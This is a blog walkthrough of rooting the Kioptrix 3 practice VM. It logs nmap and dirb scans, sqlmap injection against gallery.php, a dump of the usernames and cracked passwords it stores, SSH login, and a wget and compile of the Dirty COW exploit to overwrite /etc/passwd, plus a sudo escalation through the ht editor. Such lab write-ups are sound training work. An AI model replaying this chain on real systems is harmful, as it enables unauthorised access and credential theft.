Last night, I was solved most of the web challenge from the ctfs.me. I can’t sleep no more but ranking 3. I will write all of the challenges that i already solve may be later. Tonight i try to test next third box of Kioptrix series. Let’s get start.
Target ip is 192.168.1.73
┌─[[email protected]]─[~] └──> nmap 192.168.1.* -sn -n Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 20:37 +0630 Nmap scan report for 192.168.1.1 Host is up (0.00038s latency). MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies) Nmap scan report for 192.168.1.73 Host is up (0.00049s latency). MAC Address: 00:0C:29:ED:78:4A (VMware) Nmap scan report for 192.168.1.74 Host is up (0.0045s latency). MAC Address: CC:AF:78:12:3B:9F (Hon Hai Precision Ind.) Nmap scan report for 192.168.1.100 Host is up (0.00016s latency). MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer) Nmap scan report for 192.168.1.101 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 1.25 seconds
Scan again with Nmap version scan.
┌─[[email protected]]─[~] └──> nmap -sV 192.168.1.73 Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 20:40 +0630 Nmap scan report for kioptrix3.com (192.168.1.73) Host is up (0.00026s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) MAC Address: 00:0C:29:ED:78:4A (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.29 seconds
So simple, just only ssh and http open. Scan the dir again with dirbuster.
┌─[[email protected]]─[~] └──> dirb http://192.168.1.73 -r ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Jan 7 20:41:09 2018 URL_BASE: http://192.168.1.73/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt OPTION: Not Recursive ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.1.73/ ---- ==> DIRECTORY: http://192.168.1.73/cache/ ==> DIRECTORY: http://192.168.1.73/core/ + http://192.168.1.73/data (CODE:403|SIZE:323) + http://192.168.1.73/favicon.ico (CODE:200|SIZE:23126) ==> DIRECTORY: http://192.168.1.73/gallery/ + http://192.168.1.73/index.php (CODE:200|SIZE:1819) ==> DIRECTORY: http://192.168.1.73/modules/ ==> DIRECTORY: http://192.168.1.73/phpmyadmin/ + http://192.168.1.73/server-status (CODE:403|SIZE:332) ==> DIRECTORY: http://192.168.1.73/style/ ----------------- END_TIME: Sun Jan 7 20:41:17 2018 DOWNLOADED: 4612 - FOUND: 4
Try to open port 80 first and check vulnerable or not. Search the parameter to exploit and then i found sql injection error message when i enter the single quote.
http://kioptrix3.com/gallery/gallery.php?id=1
Now open sqlmap, dump all data from tables but i try first os shell upload test . it fail because i don’t know the web server path.
┌─[[email protected]]─[~] └──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --is-dba --os-shell ___ __H__ ___ ___[,]_____ ___ ___ {1.1.12#stable} |_ -| . [(] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 20:46:03 [20:46:04] [INFO] resuming back-end DBMS 'mysql' [20:46:04] [INFO] testing connection to the target URL [20:46:04] [INFO] heuristics detected web page charset 'ISO-8859-2' [20:46:04] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW --- [20:46:04] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL 5 [20:46:04] [INFO] testing if current user is DBA [20:46:04] [INFO] fetching current user current user is DBA: True [20:46:04] [INFO] going to use a web backdoor for command prompt [20:46:04] [INFO] fingerprinting the back-end DBMS operating system [20:46:04] [INFO] the back-end DBMS operating system is Linux which web application language does the web server support? [1] ASP [2] ASPX [3] JSP [4] PHP (default) > 4 do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y [20:46:10] [WARNING] unable to automatically retrieve the web server document root what do you want to use for writable directory? [1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default) [2] custom location(s) [3] custom directory list file [4] brute force search > 1 [20:46:12] [INFO] retrieved web server absolute paths: '/gallery/gallery~.php' [20:46:12] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method [20:46:12] [WARNING] unable to upload the file stager on '/var/www/' [20:46:12] [INFO] trying to upload the file stager on '/var/www/' via UNION method [20:46:12] [WARNING] expect junk characters inside the file as a leftover from UNION query [20:46:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path) [20:46:12] [INFO] trying to upload the file stager on '/var/www/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method [20:46:12] [WARNING] unable to upload the file stager on '/var/www/gallery/gallery.php/' [20:46:12] [INFO] trying to upload the file stager on '/var/www/gallery/gallery.php/' via UNION method [20:46:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path) [20:46:12] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method [20:46:12] [WARNING] unable to upload the file stager on '/var/www/html/' [20:46:12] [INFO] trying to upload the file stager on '/var/www/html/' via UNION method [20:46:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path) [20:46:12] [INFO] trying to upload the file stager on '/var/www/html/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method [20:46:13] [WARNING] unable to upload the file stager on '/var/www/html/gallery/gallery.php/' [20:46:13] [INFO] trying to upload the file stager on '/var/www/html/gallery/gallery.php/' via UNION method [20:46:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path) [20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method [20:46:13] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/' [20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via UNION method [20:46:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path) [20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method [20:46:13] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/gallery/gallery.php/' [20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/gallery/gallery.php/' via UNION method [20:46:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path) [20:46:13] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method [20:46:13] [WARNING] unable to upload the file stager on '/var/www/nginx-default/' [20:46:13] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via UNION method [20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path) [20:46:14] [INFO] trying to upload the file stager on '/var/www/nginx-default/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method [20:46:14] [WARNING] unable to upload the file stager on '/var/www/nginx-default/gallery/gallery.php/' [20:46:14] [INFO] trying to upload the file stager on '/var/www/nginx-default/gallery/gallery.php/' via UNION method [20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path) [20:46:14] [INFO] trying to upload the file stager on '/srv/www/' via LIMIT 'LINES TERMINATED BY' method [20:46:14] [WARNING] unable to upload the file stager on '/srv/www/' [20:46:14] [INFO] trying to upload the file stager on '/srv/www/' via UNION method [20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path) [20:46:14] [INFO] trying to upload the file stager on '/srv/www/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method [20:46:14] [WARNING] unable to upload the file stager on '/srv/www/gallery/gallery.php/' [20:46:14] [INFO] trying to upload the file stager on '/srv/www/gallery/gallery.php/' via UNION method [20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path) [20:46:14] [INFO] trying to upload the file stager on '/gallery/' via LIMIT 'LINES TERMINATED BY' method [20:46:14] [WARNING] unable to upload the file stager on '/gallery/' [20:46:14] [INFO] trying to upload the file stager on '/gallery/' via UNION method [20:46:15] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path) [20:46:15] [INFO] trying to upload the file stager on '/gallery/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method [20:46:15] [WARNING] unable to upload the file stager on '/gallery/gallery/gallery.php/' [20:46:15] [INFO] trying to upload the file stager on '/gallery/gallery/gallery.php/' via UNION method [20:46:15] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path) [20:46:15] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 97 times, 500 (Internal Server Error) - 1 times [20:46:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com' [*] shutting down at 20:46:15
Find database name with sqlmap.
┌─[[email protected]]─[~] └──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --current-db ___ __H__ ___ ___[(]_____ ___ ___ {1.1.12#stable} |_ -| . [)] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 20:47:35 [20:47:35] [INFO] resuming back-end DBMS 'mysql' [20:47:35] [INFO] testing connection to the target URL [20:47:35] [INFO] heuristics detected web page charset 'ISO-8859-2' [20:47:35] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW --- [20:47:35] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL 5 [20:47:35] [INFO] fetching current database current database: 'gallery' [20:47:35] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 1 times [20:47:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com' [*] shutting down at 20:47:35
Database name is gallery, And then try to select table from this database.
┌─[[email protected]]─[~] └──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --tables -D gallery ___ __H__ ___ ___[']_____ ___ ___ {1.1.12#stable} |_ -| . [)] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 20:48:37 [20:48:38] [INFO] resuming back-end DBMS 'mysql' [20:48:38] [INFO] testing connection to the target URL [20:48:38] [INFO] heuristics detected web page charset 'ISO-8859-2' [20:48:38] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW --- [20:48:38] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL 5 [20:48:38] [INFO] fetching tables for database: 'gallery' [20:48:38] [INFO] the SQL query used returns 7 entries [20:48:38] [INFO] resumed: dev_accounts [20:48:38] [INFO] resumed: gallarific_comments [20:48:38] [INFO] resumed: gallarific_galleries [20:48:38] [INFO] resumed: gallarific_photos [20:48:38] [INFO] resumed: gallarific_settings [20:48:38] [INFO] resumed: gallarific_stats [20:48:38] [INFO] resumed: gallarific_users Database: gallery [7 tables] +----------------------+ | dev_accounts | | gallarific_comments | | gallarific_galleries | | gallarific_photos | | gallarific_settings | | gallarific_stats | | gallarific_users | +----------------------+ [20:48:38] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 1 times [20:48:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com' [*] shutting down at 20:48:38
dev_accounts tables is main table to get the login info. Select columns again from this table.
┌─[[email protected]]─[~] └──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --columns -T dev_accounts -D gallery ___ __H__ ___ ___["]_____ ___ ___ {1.1.12#stable} |_ -| . [(] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 20:49:48 [20:49:49] [INFO] resuming back-end DBMS 'mysql' [20:49:49] [INFO] testing connection to the target URL [20:49:49] [INFO] heuristics detected web page charset 'ISO-8859-2' [20:49:49] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW --- [20:49:49] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL 5 [20:49:49] [INFO] fetching columns for table 'dev_accounts' in database 'gallery' [20:49:49] [INFO] the SQL query used returns 3 entries [20:49:49] [INFO] resumed: "id","int(10)" [20:49:49] [INFO] resumed: "username","varchar(50)" [20:49:49] [INFO] resumed: "password","varchar(50)" Database: gallery Table: dev_accounts [3 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | id | int(10) | | password | varchar(50) | | username | varchar(50) | +----------+-------------+ [20:49:49] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 1 times [20:49:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com' [*] shutting down at 20:49:49
Finally,I dump data of username and password from dev_accounts table.
┌─[[email protected]]─[~] └──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dump -C username,password -T dev_accounts -D gallery ___ __H__ ___ ___[,]_____ ___ ___ {1.1.12#stable} |_ -| . [,] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 20:50:52 [20:50:52] [INFO] resuming back-end DBMS 'mysql' [20:50:52] [INFO] testing connection to the target URL [20:50:52] [INFO] heuristics detected web page charset 'ISO-8859-2' [20:50:52] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW --- [20:50:52] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL 5 [20:50:52] [INFO] fetching entries of column(s) 'password, username' for table 'dev_accounts' in database 'gallery' [20:50:52] [INFO] the SQL query used returns 2 entries [20:50:52] [INFO] retrieved: "0d3eccfb887aabd50f243b3f155c0f85","dreg" [20:50:52] [INFO] retrieved: "5badcaf789d3d1d09794d8f021f40f0e","loneferret" [20:50:52] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n do you want to crack them via a dictionary-based attack? [Y/n/q] n Database: gallery Table: dev_accounts [2 entries] +------------+----------------------------------+ | username | password | +------------+----------------------------------+ | dreg | 0d3eccfb887aabd50f243b3f155c0f85 | | loneferret | 5badcaf789d3d1d09794d8f021f40f0e | +------------+----------------------------------+ [20:50:58] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv' [20:50:58] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 1 times [20:50:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com' [*] shutting down at 20:50:58
Password is md5 hash,I decrypt the hash at the hashkiller.co.uk. It really nice site. After decrypt the hash i got the following password
0d3eccfb887aabd50f243b3f155c0f85 MD5 : Mast3r
5badcaf789d3d1d09794d8f021f40f0e MD5 : starwars
Final username and password is dreg:Mast3r and loneferret:starwars. I already notice ssh was open at the start of entry point of the box. Let’s try to login ssh with this info.
┌─[[email protected]]─[~] └──> ssh [email protected] [email protected]'s password: Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ Last login: Sun Jan 7 15:56:07 2018 from 192.168.1.101 [email protected]:~$ ls -al; uname -a; cat /etc/passwd total 24 drwxr-xr-x 2 dreg dreg 4096 2018-01-07 15:56 . drwxr-xr-x 5 root root 4096 2011-04-16 07:54 .. -rw------- 1 dreg dreg 245 2018-01-07 15:56 .bash_history -rw-r--r-- 1 dreg dreg 220 2011-04-16 07:54 .bash_logout -rw-r--r-- 1 dreg dreg 2940 2011-04-16 07:54 .bashrc -rw-r--r-- 1 dreg dreg 586 2011-04-16 07:54 .profile Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash
Login success of first username and found 2 user in the system. Kernel version is 2.6 but it old kernel. i not sure to get the root but let’s try.
Search at the google and found dirty cow exploit to root this kernel.
https://www.exploit-db.com/exploits/40839
[email protected]:~$ wget --no-check-certificate https://www.exploit-db.com/raw/40839 -O dirty.c --16:01:56-- https://www.exploit-db.com/raw/40839 => `dirty.c' Resolving www.exploit-db.com... 192.124.249.8 Connecting to www.exploit-db.com|192.124.249.8|:443... connected. WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'. HTTP request sent, awaiting response... 200 OK Length: 5,006 (4.9K) [text/plain] 100%[============================================================================================>] 5,006 --.--K/s 16:01:57 (303.35 MB/s) - `dirty.c' saved [5006/5006] [email protected]:~$ gcc -pthread dirty.c -o dirty -lcrypt dirty.c:193:2: warning: no newline at end of file [email protected]:~$ ./dirty 133720 -rbash: ./dirty: restricted: cannot specify `/' in command names
When i complie the gcc it not allow, Let’s me change another user again.
[email protected]:~$ su loneferret Password: [email protected]:/home/dreg$ ls -al total 44 drwxr-xr-x 2 dreg dreg 4096 2018-01-07 16:02 . drwxr-xr-x 5 root root 4096 2011-04-16 07:54 .. -rw------- 1 dreg dreg 245 2018-01-07 15:56 .bash_history -rw-r--r-- 1 dreg dreg 220 2011-04-16 07:54 .bash_logout -rw-r--r-- 1 dreg dreg 2940 2011-04-16 07:54 .bashrc -rwxr-xr-x 1 dreg dreg 10939 2018-01-07 16:02 dirty -rw-r--r-- 1 dreg dreg 5006 2018-01-07 16:01 dirty.c -rw-r--r-- 1 dreg dreg 586 2011-04-16 07:54 .profile [email protected]:/home/dreg$ ./dirty 133720 /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: 133720 Complete line: firefart:fiptwK6toyYJg:0:0:pwned:/root:/bin/bash mmap: b7fe0000 madvise 0 ptrace 0 Done! Check /etc/passwd to see if the new user was created. You can log in with the username 'firefart' and the password '133720'. DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd Done! Check /etc/passwd to see if the new user was created. You can log in with the username 'firefart' and the password '133720'. DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd [email protected]:/home/dreg$ su firefart Password: [email protected]:/home//dreg# [email protected]:/home/dreg# id uid=0(firefart) gid=0(root) groups=0(root) [email protected]:/home/dreg# mv /tmp/passwd.bak /etc/passwd [email protected]:/home/dreg# id uid=0(root) gid=0(root) groups=0(root) [email protected]:/home/dreg#
Yo! Dirty Cow can root!… 😉 , Read the flag /root/Congrats.txt
[email protected]:~# cat Congrats.txt Good for you for getting here. Regardless of the matter (staying within the spirit of the game of course) you got here, congratulations are in order. Wasn't that bad now was it. Went in a different direction with this VM. Exploit based challenges are nice. Helps workout that information gathering part, but sometimes we need to get our hands dirty in other things as well. Again, these VMs are beginner and not intented for everyone. Difficulty is relative, keep that in mind. The object is to learn, do some research and have a little (legal) fun in the process. I hope you enjoyed this third challenge. Steven McElrea aka loneferret http://www.kioptrix.com Credit needs to be given to the creators of the gallery webapp and CMS used for the building of the Kioptrix VM3 site. Main page CMS: http://www.lotuscms.org Gallery application: Gallarific 2.1 - Free Version released October 10, 2009 http://www.gallarific.com Vulnerable version of this application can be downloaded from the Exploit-DB website: http://www.exploit-db.com/exploits/15891/ The HT Editor can be found here: http://hte.sourceforge.net/downloads.html And the vulnerable version on Exploit-DB here: http://www.exploit-db.com/exploits/17083/ Also, all pictures were taken from Google Images, so being part of the public domain I used them. [email protected]:~#
Bango! We done the third box again! but there have another method to get root. I check at the sudoer file and user loneferret can run ht editor as root.
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
let’s try another way
[email protected]:/# su loneferret [email protected]:/$ clear 'xterm-256color': unknown terminal type. [email protected]:/$ export TERM=xterm [email protected]:/$ sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: !/usr/bin/su (root) NOPASSWD: /usr/local/bin/ht [email protected]:/$ sudo /usr/local/bin/ht [email protected]:/$ sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: !/usr/bin/su (root) NOPASSWD: /usr/local/bin/ht (root) NOPASSWD: /bin/bash [email protected]:/$ sudo /bin/bash [email protected]:/# id uid=0(root) gid=0(root) groups=0(root) [email protected]:/# whoami root [email protected]:/#
Wooot.. AGain! Thanks for reading .. Happy Hacking..